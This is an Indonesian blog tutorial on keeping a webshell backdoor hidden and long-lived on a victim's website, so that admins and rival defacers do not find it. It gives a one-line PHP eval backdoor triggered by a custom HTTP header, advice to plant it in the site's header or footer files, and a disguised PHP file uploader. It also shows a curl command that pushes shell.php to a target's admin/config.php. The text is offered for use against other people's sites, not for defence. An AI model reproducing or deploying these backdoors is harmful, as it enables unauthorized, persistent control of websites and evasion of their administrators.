Cara agar webshell tetap awet tentunya cukup sulit akan tetapi kita akan belajar bagaimana tips supaya webshell atau shell backdoor tetap awet di website korban. sebenarnya ada banyak sekali cara untuk menyembunyikan shell atau backdoor di webite korban agar tetap awet dan tidak terdeteksi oleh admin.
Atau bisa juga menggunakan cara ini agar terhindar dari Defacer lain, alias penikung shell backdoor. Penikung shell atau tukang tikung ini biasanya memanfaatkan shell backdoor milik orang lain, entah itu dari dorking shell maupun dengan cara melakukan scan backdoor.
Dengan memanfaatkan shell kita seorang penikung shell bisa dengan mudah masuk ke server tanpa harus melakukan pentesting atau semacamnya.
Pengertian Shell Backdoor Atau Webshell
Dalam dunia keamanan siber, istilah "shell backdoor" merujuk pada jenis perangkat lunak atau kode yang dirancang untuk memberikan akses tak sah ke sistem komputer atau jaringan. Backdoor ini biasanya digunakan oleh penyerang untuk mengendalikan sistem atau perangkat yang telah mereka retas. Untuk memahami dengan lebih mendalam apa itu shell backdoor, kita harus melihat komponen-komponen utamanya, cara kerjanya, tujuan penggunaannya, dan upaya perlindungan yang dapat diambil untuk mencegah serangan semacam ini.
Cara Agar Shell Backdoor Tetap Awet di Website Target
Mungkin sudah banyak sekali tutorial yang membahas tentang cara menanam shell backdoor dan membuatnya agar tetap awet di website korban. Dari sekian banyak tutorial kali ini saya akan berbagi salah satu tutorial yang sangat efektif untuk menanam shell backdoor dan membuatnya tetap awet di website korban dan terhindar dari para penikung shell backdoor.
1. Menggunakan Remote Backdoor
Cara yang paling simple yakni adalah dengan memasukan kode remote shell. contohnya:
<?php @eval($_SERVER['HTTP_YUKISEC']); ?>
Dengan kode remote shell ini kita dapat meremote backdoor tanpa harus menanam sebuah shell backdoor yang besar. kalian bisa sisipkan kode tersebut di file penting di website korban, contohnya di bagian footer, header, atau semacamnya.
Dan untuk memanggil shellnya kalian bisa gunakan PHPSPLOIT.
2. Menggunakan Hidden Shell Backdoor
Cara alternatif yang lain adalah dengan memanfaatkan hidden shell, cara ini juga efektif untuk menanam backdoor agar tetap awet di webite target. berikut contohnya:
<?php
$targetDir = __DIR__ . "/";
if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
$tempFile = $_FILES['file']['tmp_name'];
$targetFile = $targetDir . $_FILES['file']['name'];
if (move_uploaded_file($tempFile, $targetFile)) {
echo "File berhasil diunggah.";
} else {
echo "Terjadi kesalahan saat mengunggah file.";
}
} else {
echo "Error" . $_FILES['file']['error'];
}
?>
Ini merupakan salah satu contoh hiden shell, sebenarnya ini merupakan uploader, namun untuk mengaksesnya kalian harus melakukan remote misalnya dengan CURL.
$curl -F "file=@shell.php" http://target.com/admin/config.php
Dengan begini kalian bisa meremote uploader tanpa diketahui oleh admin. dan pastinya cara ini juga memiliki berapa kekurangan, misalnya website tersebut tidak bisa menggunakan curl, atau memasang cloudflare dan semacamnya.
Begitulah caranya menanam shell backdoor agar tidak terdeteksi oleh admin dengan tutorial ini kalian bisa menanam webshell supaya tetap awet. Dan cara yang lain mungkin kalian bisa menanam Logger atau semacamnya di webshell kalian agar terhindar dari penikung shell. Semoga Bermanfaat.
Harap Tidak Menggunakan Link, Spam, Dan Malware